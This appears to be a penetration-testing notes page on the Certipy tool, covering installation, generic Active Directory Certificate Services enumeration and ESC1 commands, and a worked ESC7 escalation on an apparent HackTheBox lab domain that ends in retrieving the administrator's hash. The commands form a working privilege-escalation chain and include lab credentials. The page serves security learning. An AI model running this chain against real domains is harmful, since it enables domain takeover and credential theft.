Certipy

About

Certipy is a tool for Active Directory Certificate Services enumeration and abuse. It's is an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS). If you're not familiar with AD CS and the various domain escalation techniques, from the github, a good resource is: Certified Pre-Owned by Will Schroeder and Lee Christensen.

Links

Certipy Github

Installing

Install reqs

sudo apt update && sudo apt install -y python3 python3-pip

From within a Virtual Envrionment(venv)

pip install certipy-ad

Usage

Enumerate AD CS - The attacker runs certipy find to discover any vulnerable configurations:

certipy find -u 'USER@DOMAIN' -p 'PASSWORD' -dc-ip 'DC-IP' -text -enabled -hide-admins

Dump all CAs and Templates

certipy find -u 'USER@DOMAIN' -p 'PASSWORD' -dc-ip 'DC-IP'

ESC1 - write pfx file

certipy req -u 'USER@DOMAIN' -p 'PASSWORD' -dc-ip 'DC-IP' -target "TARGET_CA_DNS" -ca "CA_NAME" -template "TEMPLATE" -upn "TARGET_USER_AT_DOMAIN_COM" -sid "TARGET_USER_SID" -key-size 4096

ESC1 - Authenticate with pfx file

certipy auth -pfx "PFX_FILE_NAME" -dc-ip "DC-IP"

Usage

We can use the find argument to enumerate AD CS certificate templates, certificate authorities and other configurations and with -vulnerable it can show us what "ESC#"(Escalation number, for a full list, checkout the Github they are vulnerable to. In this example, it's Vulnable to ESC7, which is when a user has the Manage CA or Manage Certificates access right on a CA.

certipy-ad find -vulnerable -u [email protected] -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.139.52 -stdout

So in this example we have Ravens credentials and can upgrade her account to have additional permissions. If you only have the Manage CA access right, you can grant yourself the Manage Certificates access right by adding your user as a new officer.

certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'

The SubCA template can be enabled on the CA with the -enable-template parameter. By default, the SubCA template is enabled.

certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'

If we have fulfilled the prerequisites for this attack, we can start by requesting a certificate based on the SubCA template. This request will be denied, but we will save the private key and note down the request ID. With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.

certipy-ad req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn [email protected]

With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.

certipy-ad ca -ca 'manager-DC01-CA' -issue-request 17 -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'

And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.

certipy-ad req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -retrieve 17

Now that we have the Administrator.pfx file we can obtain the admin hash using the auth argument. From the github "The auth command will use either the PKINIT Kerberos extension or Schannel protocol for authentication with the provided certificate. Kerberos can be used to retrieve a TGT and the NT hash for the target user, whereas Schannel will open a connection to LDAPS and drop into an interactive shell with limited LDAP commands. See the blog posts for more information on when to use which option"

certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'manager.htb' -dc-ip 10.129.139.52

Last updated 2 months ago